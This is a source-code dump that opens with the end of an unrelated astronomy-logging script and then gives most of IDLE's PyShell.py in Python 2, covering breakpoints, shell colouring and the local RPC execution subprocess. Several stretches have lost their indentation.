        night = vutils.get_tonight()
        log_file_path = f"{config['logging_root']}/{night}_donuts.log"
        logging.basicConfig(filename=log_file_path,
                            level=level,
                            format='%(asctime)s:%(levelname)s:%(name)s:%(message)s')
    # set up Voyager/Donuts
    voyager = Voyager(config)
    # run the script
    voyager.run()
|
PyShell.py | #! /usr/bin/env python
from __future__ import print_function
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import io
import linecache
from code import InteractiveInterpreter
from platform import python_version, system
try:
from Tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
from idlelib import IOBinding
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
import warnings
def idle_formatwarning(message, category, filename, lineno, line=None):
    """Format warnings the IDLE way."""
    parts = ["\nWarning (from warnings module):\n",
             ' File \"%s\", line %s\n' % (filename, lineno)]
    # fall back to the cached source line when none was supplied
    if line is None:
        line = linecache.getline(filename, lineno)
    line = line.strip()
    if line:
        parts.append(" %s\n" % line)
    parts.append("%s: %s\n" % (category.__name__, message))
    return "".join(parts)
def idle_showwarning(
        message, category, filename, lineno, file=None, line=None):
    """Show Idle-format warning (after replacing warnings.showwarning).

    The differences are the formatter called, the file=None replacement,
    which can be None, the capture of the consequence AttributeError,
    and the output of a hard-coded prompt.
    """
    target = warning_stream if file is None else file
    try:
        target.write(idle_formatwarning(
            message, category, filename, lineno, line=line))
        target.write(">>> ")
    except (AttributeError, IOError):
        pass  # if file (probably __stderr__) is invalid, skip warning.
# original warnings.showwarning, stashed while IDLE's hook is installed
_warnings_showwarning = None

def capture_warnings(capture):
    "Replace warning.showwarning with idle_showwarning, or reverse."
    global _warnings_showwarning
    if capture and _warnings_showwarning is None:
        # install the IDLE hook, remembering the original
        _warnings_showwarning = warnings.showwarning
        warnings.showwarning = idle_showwarning
    elif not capture and _warnings_showwarning is not None:
        # restore the original hook
        warnings.showwarning = _warnings_showwarning
        _warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
                                  orig_checkcache=linecache.checkcache):
    """Extend linecache.checkcache to preserve the <pyshell#...> entries

    Rather than repeating the linecache code, patch it to save the
    <pyshell#...> entries, call the original linecache.checkcache()
    (skipping them), and then restore the saved entries.

    orig_checkcache is bound at definition time to the original
    method, allowing it to be patched.
    """
    cache = linecache.cache
    # stash every "<...>" pseudo-file entry before the real check runs
    saved = {key: cache.pop(key) for key in list(cache)
             if key[:1] + key[-1:] == '<>'}
    orig_checkcache(filename)
    cache.update(saved)
# Patch linecache.checkcache() so <pyshell#...> entries survive cache checks:
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath,"r") as old_file:
lines = old_file.readlines()
except IOError:
lines = []
try:
with open(self.breakpointPath,"w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except IOError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
    def _close(self):
        "Extend base method - clear breaks when module is closed"
        # Drop breakpoints first so the subprocess debugger is told to
        # forget them before the window infrastructure is torn down.
        self.clear_file_breaks()
        EditorWindow._close(self)
class PyShellFileList(FileList):
    "Extend base class: IDLE supports a shell and breakpoints"

    # override FileList's class variable, instances return PyShellEditorWindow
    # instead of EditorWindow when new edit windows are created.
    EditorWindow = PyShellEditorWindow

    # The single shell window, created lazily by open_shell().
    pyshell = None

    def open_shell(self, event=None):
        """Return the shell window, creating and starting it on first use.

        Returns None if the shell was created but failed to begin()
        (e.g. its subprocess could not be started).
        """
        if self.pyshell:
            self.pyshell.top.wakeup()
        else:
            self.pyshell = PyShell(self)
            if self.pyshell:
                if not self.pyshell.begin():
                    return None
        return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
    "Extend base class: colorizer for the shell window itself"

    def __init__(self):
        ColorDelegator.__init__(self)
        self.LoadTagDefs()

    def recolorize_main(self):
        # Only text after the I/O mark is user input; everything before it
        # is prior output and keeps its existing coloring.
        self.tag_remove("TODO", "1.0", "iomark")
        self.tag_add("SYNC", "1.0", "iomark")
        ColorDelegator.recolorize_main(self)

    def LoadTagDefs(self):
        """Extend base tag definitions with the shell's stream tags."""
        ColorDelegator.LoadTagDefs(self)
        theme = idleConf.CurrentTheme()
        self.tagdefs.update({
            "stdin": {'background':None,'foreground':None},
            "stdout": idleConf.GetHighlight(theme, "stdout"),
            "stderr": idleConf.GetHighlight(theme, "stderr"),
            "console": idleConf.GetHighlight(theme, "console"),
        })

    def removecolors(self):
        # Don't remove shell color tags before "iomark"
        for tag in self.tagdefs:
            self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
    "Extend base class: forbid insert/delete before the I/O mark"

    def insert(self, index, chars, tags=None):
        # Beep and refuse edits in the read-only region before "iomark"
        # (the prompt and previous output).
        try:
            if self.delegate.compare(index, "<", "iomark"):
                self.delegate.bell()
                return
        except TclError:
            # index may not resolve (e.g. no such mark yet); allow the edit.
            pass
        UndoDelegator.insert(self, index, chars, tags)

    def delete(self, index1, index2=None):
        # Same guard as insert(): protect everything before "iomark".
        try:
            if self.delegate.compare(index1, "<", "iomark"):
                self.delegate.bell()
                return
        except TclError:
            pass
        UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
    """RPCClient whose lost-connection handling is a plain EOFError."""

    def handle_EOF(self):
        "Override the base class - just re-raise EOFError"
        # The shell's poll loop catches EOFError and restarts the subprocess.
        raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
    """Interpreter that runs user code in a separate RPC execution server.

    Handles spawning the subprocess, connecting to it over a socket,
    polling it for results, and restarting or killing it on demand.
    When no subprocess is used, code is exec'd directly in __main__.
    """

    def __init__(self, tkconsole):
        self.tkconsole = tkconsole
        # User code executes in (a remote copy of) the __main__ namespace.
        locals = sys.modules['__main__'].__dict__
        InteractiveInterpreter.__init__(self, locals=locals)
        self.save_warnings_filters = None
        self.restarting = False
        self.subprocess_arglist = None
        self.port = PORT
        self.original_compiler_flags = self.compile.compiler.flags

    _afterid = None   # pending Tk after() id for poll_subprocess
    rpcclt = None     # RPC client once the subprocess has connected
    rpcpid = None     # pid of the spawned execution server

    def spawn_subprocess(self):
        """Start the execution server as a detached child process."""
        if self.subprocess_arglist is None:
            self.subprocess_arglist = self.build_subprocess_arglist()
        args = self.subprocess_arglist
        self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)

    def build_subprocess_arglist(self):
        """Build (and cache via spawn_subprocess) the server's argv."""
        assert (self.port!=0), (
            "Socket should have been assigned a port number.")
        w = ['-W' + s for s in sys.warnoptions]
        if 1/2 > 0: # account for new division
            w.append('-Qnew')
        # Maybe IDLE is installed and is being accessed via sys.path,
        # or maybe it's not installed and the idle.py script is being
        # run from the IDLE source directory.
        del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
                                       default=False, type='bool')
        if __name__ == 'idlelib.PyShell':
            command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
        else:
            command = "__import__('run').main(%r)" % (del_exitf,)
        if sys.platform[:3] == 'win' and ' ' in sys.executable:
            # handle embedded space in path by quoting the argument
            decorated_exec = '"%s"' % sys.executable
        else:
            decorated_exec = sys.executable
        return [decorated_exec] + w + ["-c", command, str(self.port)]

    def start_subprocess(self):
        """Bind the listening socket, spawn the server and accept it.

        Returns the connected RPC client, or None on failure (an error
        dialog is shown in that case).
        """
        addr = (HOST, self.port)
        # GUI makes several attempts to acquire socket, listens for connection
        for i in range(3):
            time.sleep(i)
            try:
                self.rpcclt = MyRPCClient(addr)
                break
            except socket.error:
                pass
        else:
            self.display_port_binding_error()
            return None
        # if PORT was 0, system will assign an 'ephemeral' port. Find it out:
        self.port = self.rpcclt.listening_sock.getsockname()[1]
        # if PORT was not 0, probably working with a remote execution server
        if PORT != 0:
            # To allow reconnection within the 2MSL wait (cf. Stevens TCP
            # V1, 18.6), set SO_REUSEADDR.  Note that this can be problematic
            # on Windows since the implementation allows two active sockets on
            # the same address!
            self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
                                                  socket.SO_REUSEADDR, 1)
        self.spawn_subprocess()
        #time.sleep(20) # test to simulate GUI not accepting connection
        # Accept the connection from the Python execution server
        self.rpcclt.listening_sock.settimeout(10)
        try:
            self.rpcclt.accept()
        except socket.timeout:
            self.display_no_subprocess_error()
            return None
        # Expose shell-side objects to the subprocess by name.
        self.rpcclt.register("console", self.tkconsole)
        self.rpcclt.register("stdin", self.tkconsole.stdin)
        self.rpcclt.register("stdout", self.tkconsole.stdout)
        self.rpcclt.register("stderr", self.tkconsole.stderr)
        self.rpcclt.register("flist", self.tkconsole.flist)
        self.rpcclt.register("linecache", linecache)
        self.rpcclt.register("interp", self)
        self.transfer_path(with_cwd=True)
        self.poll_subprocess()
        return self.rpcclt

    def restart_subprocess(self, with_cwd=False, filename=''):
        """Tear down the current execution server and start a fresh one.

        Guarded by self.restarting so re-entrant calls (e.g. from the
        poll loop) are no-ops.  Returns the new RPC client or None.
        """
        if self.restarting:
            return self.rpcclt
        self.restarting = True
        # close only the subprocess debugger
        debug = self.getdebugger()
        if debug:
            try:
                # Only close subprocess debugger, don't unregister gui_adap!
                RemoteDebugger.close_subprocess_debugger(self.rpcclt)
            except:
                pass
        # Kill subprocess, spawn a new one, accept connection.
        self.rpcclt.close()
        self.unix_terminate()
        console = self.tkconsole
        was_executing = console.executing
        console.executing = False
        self.spawn_subprocess()
        try:
            self.rpcclt.accept()
        except socket.timeout:
            self.display_no_subprocess_error()
            return None
        self.transfer_path(with_cwd=with_cwd)
        console.stop_readline()
        # annotate restart in shell window and mark it
        console.text.delete("iomark", "end-1c")
        tag = 'RESTART: ' + (filename if filename else 'Shell')
        halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
        console.write("\n{0} {1} {0}".format(halfbar, tag))
        console.text.mark_set("restart", "end-1c")
        console.text.mark_gravity("restart", "left")
        if not filename:
            console.showprompt()
        # restart subprocess debugger
        if debug:
            # Restarted debugger connects to current instance of debug GUI
            RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
            # reload remote debugger breakpoints for all PyShellEditWindows
            debug.load_breakpoints()
        self.compile.compiler.flags = self.original_compiler_flags
        self.restarting = False
        return self.rpcclt

    def __request_interrupt(self):
        # Runs in a worker thread; blocks until the server acknowledges.
        self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})

    def interrupt_subprocess(self):
        """Ask the server to raise KeyboardInterrupt, without blocking the GUI."""
        threading.Thread(target=self.__request_interrupt).start()

    def kill_subprocess(self):
        """Cancel polling, close the RPC link and terminate the child."""
        if self._afterid is not None:
            self.tkconsole.text.after_cancel(self._afterid)
        try:
            self.rpcclt.close()
        except AttributeError:  # no socket
            pass
        self.unix_terminate()
        self.tkconsole.executing = False
        self.rpcclt = None

    def unix_terminate(self):
        "UNIX: make sure subprocess is terminated and collect status"
        if hasattr(os, 'kill'):
            try:
                os.kill(self.rpcpid, SIGTERM)
            except OSError:
                # process already terminated:
                return
            else:
                try:
                    # Reap the child so it does not linger as a zombie.
                    os.waitpid(self.rpcpid, 0)
                except OSError:
                    return

    def transfer_path(self, with_cwd=False):
        """Mirror this process's sys.path into the execution server."""
        if with_cwd:        # Issue 13506
            path = ['']     # include Current Working Directory
            path.extend(sys.path)
        else:
            path = sys.path

        self.runcommand("""if 1:
        import sys as _sys
        _sys.path = %r
        del _sys
        \n""" % (path,))

    # Sequence number of the request currently executing remotely, if any.
    active_seq = None

    def poll_subprocess(self):
        """Periodic check for a response from the execution server.

        Reschedules itself via Tk after() while the console is open; on
        lost connection the subprocess is restarted.
        """
        clt = self.rpcclt
        if clt is None:
            return
        try:
            response = clt.pollresponse(self.active_seq, wait=0.05)
        except (EOFError, IOError, KeyboardInterrupt):
            # lost connection or subprocess terminated itself, restart
            # [the KBI is from rpc.SocketIO.handle_EOF()]
            if self.tkconsole.closing:
                return
            response = None
            self.restart_subprocess()
        if response:
            self.tkconsole.resetoutput()
            self.active_seq = None
            how, what = response
            console = self.tkconsole.console
            if how == "OK":
                if what is not None:
                    print(repr(what), file=console)
            elif how == "EXCEPTION":
                if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
                    self.remote_stack_viewer()
            elif how == "ERROR":
                errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
                print(errmsg, what, file=sys.__stderr__)
                print(errmsg, what, file=console)
            # we received a response to the currently active seq number:
            try:
                self.tkconsole.endexecuting()
            except AttributeError:  # shell may have closed
                pass
        # Reschedule myself
        if not self.tkconsole.closing:
            self._afterid = self.tkconsole.text.after(
                self.tkconsole.pollinterval, self.poll_subprocess)

    # Debugger proxy installed by the shell's Debug menu, or None.
    debugger = None

    def setdebugger(self, debugger):
        self.debugger = debugger

    def getdebugger(self):
        return self.debugger

    def open_remote_stack_viewer(self):
        """Initiate the remote stack viewer from a separate thread.

        This method is called from the subprocess, and by returning from this
        method we allow the subprocess to unblock.  After a bit the shell
        requests the subprocess to open the remote stack viewer which returns a
        static object looking at the last exception.  It is queried through
        the RPC mechanism.
        """
        self.tkconsole.text.after(300, self.remote_stack_viewer)
        return

    def remote_stack_viewer(self):
        """Open a tree browser showing the subprocess's last traceback."""
        from idlelib import RemoteObjectBrowser
        oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
        if oid is None:
            # No traceback available in the subprocess.
            self.tkconsole.root.bell()
            return
        item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
        from idlelib.TreeWidget import ScrolledCanvas, TreeNode
        top = Toplevel(self.tkconsole.root)
        theme = idleConf.CurrentTheme()
        background = idleConf.GetHighlight(theme, 'normal')['background']
        sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
        sc.frame.pack(expand=1, fill="both")
        node = TreeNode(sc.canvas, None, item)
        node.expand()
        # XXX Should GC the remote tree when closing the window

    # Counter used to make unique "<pyshell#N>" pseudo-filenames.
    gid = 0

    def execsource(self, source):
        "Like runsource() but assumes complete exec source"
        filename = self.stuffsource(source)
        self.execfile(filename, source)

    def execfile(self, filename, source=None):
        "Execute an existing file"
        if source is None:
            source = open(filename, "r").read()
        try:
            code = compile(source, filename, "exec", dont_inherit=True)
        except (OverflowError, SyntaxError):
            self.tkconsole.resetoutput()
            print('*** Error in script or command!\n'
                  'Traceback (most recent call last):',
                  file=self.tkconsole.stderr)
            InteractiveInterpreter.showsyntaxerror(self, filename)
            self.tkconsole.showprompt()
        else:
            self.runcode(code)

    def runsource(self, source):
        "Extend base class method: Stuff the source in the line cache first"
        filename = self.stuffsource(source)
        self.more = 0
        self.save_warnings_filters = warnings.filters[:]
        warnings.filterwarnings(action="error", category=SyntaxWarning)
        if isinstance(source, unicode) and IOBinding.encoding != 'utf-8':
            try:
                # Re-encode non-UTF-8 input and declare the coding so the
                # compiler decodes it correctly.
                source = '# -*- coding: %s -*-\n%s' % (
                        IOBinding.encoding,
                        source.encode(IOBinding.encoding))
            except UnicodeError:
                self.tkconsole.resetoutput()
                self.write("Unsupported characters in input\n")
                return
        try:
            # InteractiveInterpreter.runsource() calls its runcode() method,
            # which is overridden (see below)
            return InteractiveInterpreter.runsource(self, source, filename)
        finally:
            if self.save_warnings_filters is not None:
                warnings.filters[:] = self.save_warnings_filters
                self.save_warnings_filters = None

    def stuffsource(self, source):
        "Stuff source in the filename cache"
        filename = "<pyshell#%d>" % self.gid
        self.gid = self.gid + 1
        lines = source.split("\n")
        linecache.cache[filename] = len(source)+1, 0, lines, filename
        return filename

    def prepend_syspath(self, filename):
        "Prepend sys.path with file's directory if not already included"
        self.runcommand("""if 1:
            _filename = %r
            import sys as _sys
            from os.path import dirname as _dirname
            _dir = _dirname(_filename)
            if not _dir in _sys.path:
                _sys.path.insert(0, _dir)
            del _filename, _sys, _dirname, _dir
            \n""" % (filename,))

    def showsyntaxerror(self, filename=None):
        """Extend base class method: Add Colorizing

        Color the offending position instead of printing it and pointing at it
        with a caret.
        """
        text = self.tkconsole.text
        stuff = self.unpackerror()
        if stuff:
            msg, lineno, offset, line = stuff
            if lineno == 1:
                pos = "iomark + %d chars" % (offset-1)
            else:
                pos = "iomark linestart + %d lines + %d chars" % \
                      (lineno-1, offset-1)
            text.tag_add("ERROR", pos)
            text.see(pos)
            char = text.get(pos)
            if char and char in IDENTCHARS:
                # Extend the highlight back over the whole identifier.
                text.tag_add("ERROR", pos + " wordstart", pos)
            self.tkconsole.resetoutput()
            self.write("SyntaxError: %s\n" % str(msg))
        else:
            self.tkconsole.resetoutput()
            InteractiveInterpreter.showsyntaxerror(self, filename)
        self.tkconsole.showprompt()

    def unpackerror(self):
        # Unpack the current SyntaxError into (msg, lineno, offset, line),
        # or return None if the exception does not unpack that way.
        type, value, tb = sys.exc_info()
        ok = type is SyntaxError
        if ok:
            try:
                msg, (dummy_filename, lineno, offset, line) = value
                if not offset:
                    offset = 0
            except:
                ok = 0
        if ok:
            return msg, lineno, offset, line
        else:
            return None

    def showtraceback(self):
        "Extend base class method to reset output properly"
        self.tkconsole.resetoutput()
        self.checklinecache()
        InteractiveInterpreter.showtraceback(self)
        if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
            self.tkconsole.open_stack_viewer()

    def checklinecache(self):
        # Drop all linecache entries except IDLE's own "<pyshell#N>" ones,
        # so tracebacks show fresh file contents.
        c = linecache.cache
        for key in c.keys():
            if key[:1] + key[-1:] != "<>":
                del c[key]

    def runcommand(self, code):
        "Run the code without invoking the debugger"
        # The code better not raise an exception!
        if self.tkconsole.executing:
            self.display_executing_dialog()
            return 0
        if self.rpcclt:
            self.rpcclt.remotequeue("exec", "runcode", (code,), {})
        else:
            exec code in self.locals
        return 1

    def runcode(self, code):
        "Override base class method"
        if self.tkconsole.executing:
            self.interp.restart_subprocess()
        self.checklinecache()
        if self.save_warnings_filters is not None:
            warnings.filters[:] = self.save_warnings_filters
            self.save_warnings_filters = None
        debugger = self.debugger
        try:
            self.tkconsole.beginexecuting()
            if not debugger and self.rpcclt is not None:
                # Queue for remote execution; result arrives via the poll loop.
                self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
                                                        (code,), {})
            elif debugger:
                debugger.run(code, self.locals)
            else:
                exec code in self.locals
        except SystemExit:
            if not self.tkconsole.closing:
                if tkMessageBox.askyesno(
                    "Exit?",
                    "Do you want to exit altogether?",
                    default="yes",
                    parent=self.tkconsole.text):
                    raise
                else:
                    self.showtraceback()
            else:
                raise
        except:
            if use_subprocess:
                print("IDLE internal error in runcode()",
                      file=self.tkconsole.stderr)
                self.showtraceback()
                self.tkconsole.endexecuting()
            else:
                if self.tkconsole.canceled:
                    self.tkconsole.canceled = False
                    print("KeyboardInterrupt", file=self.tkconsole.stderr)
                else:
                    self.showtraceback()
        finally:
            if not use_subprocess:
                try:
                    self.tkconsole.endexecuting()
                except AttributeError:  # shell may have closed
                    pass

    def write(self, s):
        "Override base class method"
        self.tkconsole.stderr.write(s)

    def display_port_binding_error(self):
        tkMessageBox.showerror(
            "Port Binding Error",
            "IDLE can't bind to a TCP/IP port, which is necessary to "
            "communicate with its Python execution server.  This might be "
            "because no networking is installed on this computer.  "
            "Run IDLE with the -n command line switch to start without a "
            "subprocess and refer to Help/IDLE Help 'Running without a "
            "subprocess' for further details.",
            parent=self.tkconsole.text)

    def display_no_subprocess_error(self):
        tkMessageBox.showerror(
            "Subprocess Startup Error",
            "IDLE's subprocess didn't make connection.  Either IDLE can't "
            "start a subprocess or personal firewall software is blocking "
            "the connection.",
            parent=self.tkconsole.text)

    def display_executing_dialog(self):
        tkMessageBox.showerror(
            "Already executing",
            "The Python Shell window is already executing a command; "
            "please wait until it is finished.",
            parent=self.tkconsole.text)
class PyShell(OutputWindow):
    """The interactive Python shell window.

    An OutputWindow whose text widget serves as prompt, input line and
    output area at once; the "iomark" text mark separates read-only
    output from editable user input.
    """

    shell_title = "Python " + python_version() + " Shell"

    # Override classes
    ColorDelegator = ModifiedColorDelegator
    UndoDelegator = ModifiedUndoDelegator

    # Override menus
    menu_specs = [
        ("file", "_File"),
        ("edit", "_Edit"),
        ("debug", "_Debug"),
        ("options", "_Options"),
        ("windows", "_Window"),
        ("help", "_Help"),
    ]

    # New classes
    from idlelib.IdleHistory import History

    def __init__(self, flist=None):
        if use_subprocess:
            ms = self.menu_specs
            if ms[2][0] != "shell":
                ms.insert(2, ("shell", "She_ll"))
        self.interp = ModifiedInterpreter(self)
        if flist is None:
            # Stand-alone shell: create a hidden root and a file list.
            root = Tk()
            fixwordbreaks(root)
            root.withdraw()
            flist = PyShellFileList(root)
        #
        OutputWindow.__init__(self, flist, None, None)
        #
##        self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
        self.usetabs = True
        # indentwidth must be 8 when using tabs.  See note in EditorWindow:
        self.indentwidth = 8
        self.context_use_ps1 = True
        #
        text = self.text
        text.configure(wrap="char")
        text.bind("<<newline-and-indent>>", self.enter_callback)
        text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
        text.bind("<<interrupt-execution>>", self.cancel_callback)
        text.bind("<<end-of-file>>", self.eof_callback)
        text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
        text.bind("<<toggle-debugger>>", self.toggle_debugger)
        text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
        if use_subprocess:
            text.bind("<<view-restart>>", self.view_restart_mark)
            text.bind("<<restart-shell>>", self.restart_shell)
        #
        # Keep the real std streams so _close() can restore them.
        self.save_stdout = sys.stdout
        self.save_stderr = sys.stderr
        self.save_stdin = sys.stdin
        from idlelib import IOBinding
        self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
        self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
        self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
        self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
        if not use_subprocess:
            sys.stdout = self.stdout
            sys.stderr = self.stderr
            sys.stdin = self.stdin
        #
        self.history = self.History(self.text)
        #
        self.pollinterval = 50  # millisec

    def get_standard_extension_names(self):
        return idleConf.GetExtensions(shell_only=True)

    # Shell state flags (class defaults; set per instance as things happen).
    reading = False              # inside readline()'s nested mainloop
    executing = False            # user code currently running
    canceled = False             # user requested an interrupt
    endoffile = False            # user typed end-of-file
    closing = False              # window shutdown in progress
    _stop_readline_flag = False  # tells readline() to return "" immediately

    def set_warning_stream(self, stream):
        global warning_stream
        warning_stream = stream

    def get_warning_stream(self):
        return warning_stream

    def toggle_debugger(self, event=None):
        if self.executing:
            tkMessageBox.showerror("Don't debug now",
                "You can only toggle the debugger when idle",
                parent=self.text)
            self.set_debugger_indicator()
            return "break"
        else:
            db = self.interp.getdebugger()
            if db:
                self.close_debugger()
            else:
                self.open_debugger()

    def set_debugger_indicator(self):
        # Mirror debugger state into the menu checkbox variable.
        db = self.interp.getdebugger()
        self.setvar("<<toggle-debugger>>", not not db)

    def toggle_jit_stack_viewer(self, event=None):
        pass # All we need is the variable

    def close_debugger(self):
        db = self.interp.getdebugger()
        if db:
            self.interp.setdebugger(None)
            db.close()
            if self.interp.rpcclt:
                RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
            self.resetoutput()
            self.console.write("[DEBUG OFF]\n")
            sys.ps1 = ">>> "
            self.showprompt()
        self.set_debugger_indicator()

    def open_debugger(self):
        if self.interp.rpcclt:
            dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
                                                           self)
        else:
            dbg_gui = Debugger.Debugger(self)
        self.interp.setdebugger(dbg_gui)
        dbg_gui.load_breakpoints()
        sys.ps1 = "[DEBUG ON]\n>>> "
        self.showprompt()
        self.set_debugger_indicator()

    def beginexecuting(self):
        "Helper for ModifiedInterpreter"
        self.resetoutput()
        self.executing = 1

    def endexecuting(self):
        "Helper for ModifiedInterpreter"
        self.executing = 0
        self.canceled = 0
        self.showprompt()

    def close(self):
        "Extend EditorWindow.close()"
        if self.executing:
            response = tkMessageBox.askokcancel(
                "Kill?",
                "Your program is still running!\n Do you want to kill it?",
                default="ok",
                parent=self.text)
            if response is False:
                return "cancel"
        self.stop_readline()
        self.canceled = True
        self.closing = True
        return EditorWindow.close(self)

    def _close(self):
        "Extend EditorWindow._close(), shut down debugger and execution server"
        self.close_debugger()
        if use_subprocess:
            self.interp.kill_subprocess()
        # Restore std streams
        sys.stdout = self.save_stdout
        sys.stderr = self.save_stderr
        sys.stdin = self.save_stdin
        # Break cycles
        self.interp = None
        self.console = None
        self.flist.pyshell = None
        self.history = None
        EditorWindow._close(self)

    def ispythonsource(self, filename):
        "Override EditorWindow method: never remove the colorizer"
        return True

